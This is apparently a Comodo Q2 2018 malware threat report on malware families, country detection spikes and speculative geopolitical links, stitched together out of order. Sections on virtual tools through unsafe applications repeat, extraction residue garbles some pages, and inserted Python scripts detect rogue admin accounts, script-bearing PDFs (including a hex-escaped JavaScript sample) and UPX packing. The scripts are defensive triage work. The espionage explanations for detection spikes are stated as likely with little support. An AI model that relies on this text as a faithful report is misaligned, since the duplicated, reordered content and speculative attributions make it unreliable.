Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the acceleration of cybercriminals' bias to hunt for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be a separately installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected in Q2 2018 was DarkComet, a remote access trojan (RAT) that is now fully 10 years old. It lets an attacker control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) accounted for an astonishingly high proportion of Comodo's Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other programs and devices by modifying them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot reach another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (.exe) and HTML (.html) files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for Viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the wooden horse of Greek mythology because their malicious functionality is hidden inside seemingly useful or benign programs. Typically a Trojan grants a remote attacker the same rights and privileges as the local user, and it can be used for many kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common Trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the Administrators group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
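The account-creation behavior attributed to Starter above leaves a recognisable trace in Windows Security auditing: a "user account was created" event (ID 4720) followed shortly by "member added to a security-enabled local group" (ID 4732) naming the Administrators group. The following detection logic is an added example written for this page, not code from the report or from Comodo; the event records it consumes are a constructed, flattened view of those two event types (real records are EVTX/XML and a collector would map them into this shape first), and the host names, account names and timestamps are made up.

```python
"""Spot the 'create an account, then make it an administrator' pattern in
Windows Security telemetry. Added example, not code from the report. The
events below are a constructed, simplified view of real 4720/4732 records
(field names here are an assumption of this example, not the EVTX schema)."""
from dataclasses import dataclass

EVENT_USER_CREATED = 4720            # "A user account was created"
EVENT_MEMBER_ADDED = 4732            # "A member was added to a security-enabled local group"
ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group


@dataclass(frozen=True)
class Finding:
    host: str
    account: str
    created_by: str        # subject that created the account
    seconds_to_admin: int  # delay between creation and elevation


def find_rogue_admins(events, allowlist=(), window_s=3600):
    """Return a Finding for every account that was created and then added to
    Administrators on the same host within window_s seconds, unless its name
    is on the allowlist (provisioning accounts you expect to be created this
    way). Events may arrive out of order, so they are sorted by timestamp."""
    allowed = {a.lower() for a in allowlist}
    created = {}   # (host, account) -> the 4720 event that created it
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        host, eid = ev["host"], ev["event_id"]
        if eid == EVENT_USER_CREATED:
            created[(host, ev["target_user"].lower())] = ev
        elif eid == EVENT_MEMBER_ADDED and ev["group_sid"] == ADMINISTRATORS_SID:
            member = ev["member"].lower()
            origin = created.get((host, member))
            if origin is None or member in allowed:
                continue   # pre-existing account, or an expected provisioning flow
            delta = ev["ts"] - origin["ts"]
            if 0 <= delta <= window_s:
                findings.append(Finding(host, ev["member"], origin["subject_user"], delta))
    return findings


# Constructed sample telemetry (not real data); ts is epoch seconds.
SAMPLE_EVENTS = [
    {"ts": 1528000000, "host": "WS-17", "event_id": 4720, "subject_user": "SYSTEM", "target_user": "svc_remote"},
    {"ts": 1528000012, "host": "WS-17", "event_id": 4732, "subject_user": "SYSTEM", "member": "svc_remote", "group_sid": ADMINISTRATORS_SID},
    {"ts": 1528003000, "host": "WS-17", "event_id": 4720, "subject_user": "jdoe", "target_user": "intern02"},  # created, never elevated
    {"ts": 1528100000, "host": "SRV-02", "event_id": 4732, "subject_user": "Administrator", "member": "helpdesk", "group_sid": ADMINISTRATORS_SID},  # no matching 4720
    {"ts": 1528200000, "host": "SRV-02", "event_id": 4732, "subject_user": "SYSTEM", "member": "svc_remote", "group_sid": "S-1-5-32-555"},  # Remote Desktop Users, not Administrators
]

if __name__ == "__main__":
    for f in find_rogue_admins(SAMPLE_EVENTS):
        print(f"{f.host}: {f.account!r} created by {f.created_by}, made admin after {f.seconds_to_admin}s")
```

Only the WS-17 account is reported: the SRV-02 elevation has no preceding creation event on that host (a pre-existing account being elevated is worth a separate, lower-priority rule), and the last record targets a different group. Keep the allowlist short and specific; every entry on it is a name an attacker can reuse to hide.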
5.2.4 Exploits
Exploits are pieces of software, chunks of data or sequences of commands that take advantage of existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
Exploit detections are comparatively rare, because the vulnerabilities they target are typically patched soon after they are discovered.
In Q2 2018 the majority of exploits detected by Comodo targeted a favorite attacker target, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating system.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
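Malicious PDFs are usually triaged before any exploit analysis by counting the name objects that give a document automatic or executable behavior, the approach popularised by Didier Stevens' pdfid. The script below is an added example written for this page, not tooling from the report; it also decodes the "#xx" hex escapes that PDF allows inside names (so "/J#61vaScript" is counted as "/JavaScript"), which is how some kits hide those keywords from a plain string search. Both sample documents are constructed here and are not real exploit files.

```python
"""pdfid-style keyword triage for PDF files. Added example, not the report's
tooling. Counts the name objects that give a PDF automatic or executable
behaviour, resolving '#xx' hex escapes first, then combines the counts into
a verdict. The two sample documents are constructed, not real files."""
import re

RISKY_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/ObjStm")

# A PDF name object is '/' followed by regular characters; '#' starts a hex escape.
_NAME_TOKEN = re.compile(rb"/[A-Za-z0-9#_.-]+")
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(token: bytes) -> str:
    """Resolve '#xx' escapes so /J#53 and /JS compare equal."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), token).decode("latin-1")


def count_risky_names(pdf: bytes) -> dict:
    """Occurrences of each risky name, after escape decoding."""
    counts = dict.fromkeys(RISKY_NAMES, 0)
    for m in _NAME_TOKEN.finditer(pdf):
        name = decode_name(m.group(0))
        if name in counts:
            counts[name] += 1
    return counts


def triage(pdf: bytes) -> dict:
    """'suspicious' when something fires automatically (/OpenAction or /AA)
    and the file also carries script, launch or rich-media capability;
    'review' when it has such capability or embedded files without an
    automatic trigger; otherwise 'clean'. A missing %PDF- header in the
    first 1024 bytes is reported separately because some readers still open
    such files while naive filters skip them."""
    counts = count_risky_names(pdf)
    auto = counts["/OpenAction"] + counts["/AA"]
    active = counts["/JavaScript"] + counts["/JS"] + counts["/Launch"] + counts["/RichMedia"]
    if auto and active:
        verdict = "suspicious"
    elif active or counts["/EmbeddedFile"]:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "counts": counts, "header_ok": b"%PDF-" in pdf[:1024]}


# Constructed samples, not real files.
BENIGN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")
EVASIVE_PDF = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
               b"3 0 obj << /S /J#61vaScript /J#53 (app.alert('hello')) >> endobj\n"
               b"trailer << /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("evasive", EVASIVE_PDF)):
        print(label, triage(doc)["verdict"], triage(doc)["counts"])
```

This is a first-pass filter, not a verdict on exploitation: keywords inside compressed object streams (/ObjStm with a /FlateDecode filter) are invisible to a raw scan, so a file with a high /ObjStm count and nothing else should be inflated with a proper parser before it is called clean.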
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Constructors, Packers, Email Flooders, Virtual Tools and Jokes.
5.3.1 Constructor
Constructors are applications used to generate malware files automatically.
In Q2 Alamar was the #1 Constructor that Comodo detected. Microsoft rates this program a "Severe" threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packing" refers to any technique for hiding or obfuscating malicious executable code by compressing it inside a larger, seemingly innocuous program or data stream; the hidden code can even be a script. The packed data usually carries its own decompression stub, or is a self-extracting archive, which rebuilds the original code from the compressed form and then executes the malware. Encryption may be layered on as well, to conceal the payload from security software.
MUPX, the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. UPX itself is free, open-source software that handles numerous executable formats across different operating systems; it uses the open-source UCL compression library, whose decompressor fits in just a few hundred bytes of code.
In Q2 2018 Russia was the #1 home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
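Two things give a UPX-packed file away on a first look: the markers the stock packer leaves behind (section names UPX0/UPX1 and a "UPX!" signature), and the near-random byte distribution of the compressed payload. A modified build such as MUPX can rename the markers, which is why the second check matters. The triage script below is an added example written for this page, not code from the report or from the UPX project; the entropy threshold is a rule of thumb assumed here, and the three sample buffers are constructed, not real executables.

```python
"""Triage a binary for UPX-style packing. Added example, not code from the
report or from UPX. Stock UPX markers are checked alongside a Shannon-entropy
measurement, because compressed or encrypted payloads sit close to 8 bits
per byte while ordinary code and data do not. The sample buffers below are
constructed, not real executables."""
import hashlib
import math
from collections import Counter

UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX2", b"UPX!")
PACKED_ENTROPY = 7.2   # bits/byte; assumed rule of thumb, unpacked PE code is usually well below this


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def upx_markers(data: bytes) -> list:
    """Which of the stock UPX strings appear anywhere in the buffer."""
    return [m.decode() for m in UPX_MARKERS if m in data]


def packing_triage(data: bytes, threshold: float = PACKED_ENTROPY) -> dict:
    """Markers alone are enough to call it UPX-packed; high entropy without
    markers is reported as 'possibly-packed' so a renamed packer is not missed."""
    ent = shannon_entropy(data)
    markers = upx_markers(data)
    if markers:
        verdict = "upx-packed"
    elif ent >= threshold:
        verdict = "possibly-packed"
    else:
        verdict = "unpacked"
    return {"verdict": verdict, "entropy": round(ent, 3), "markers": markers}


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) so the sample is reproducible."""
    out, block = bytearray(), b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed samples, not real files: a plain text-heavy buffer, a buffer with
# stock UPX markers around a compressed-looking payload, and a payload whose
# packer renamed its sections (only entropy can catch it).
PLAIN_SAMPLE = b"MZ" + b"This program cannot be run in DOS mode.\r\n" * 200
UPX_SAMPLE = b"MZ" + b"\x00" * 62 + b"UPX0" + b"\x00" * 36 + b"UPX1" + _pseudo_random(8192) + b"UPX!"
RENAMED_PACKER_SAMPLE = b"MZ" + b"\x00" * 62 + b".xyz" + _pseudo_random(8192)

if __name__ == "__main__":
    for label, buf in (("plain", PLAIN_SAMPLE), ("upx", UPX_SAMPLE), ("renamed", RENAMED_PACKER_SAMPLE)):
        print(label, packing_triage(buf))
```

Whole-file entropy is deliberately coarse: a large unpacked binary that embeds a compressed resource will also score high. In practice the same measurement is taken per section after parsing the PE section table (for example with the pefile library), and a high-entropy section that also holds the entry point is the stronger signal.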
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that modify or alter malicious files so that they evade detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is just what the name says: non-malicious applications that claim to take a malicious action but are in fact intended only as humor, or simply to annoy the user for a brief period.
Such software is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information, merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and run them on purpose. Comodo nonetheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these Applications.
And finally, this timeline shows that far from being a rare occurrence, such software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application category is alarming in that, in the course of ordinary computer and Internet activity, users often install these applications inadvertently. Examples include common adware programs and widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions the user did not intend. Software of this kind includes free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US was far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and attackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed together with additional malware that users install inadvertently.
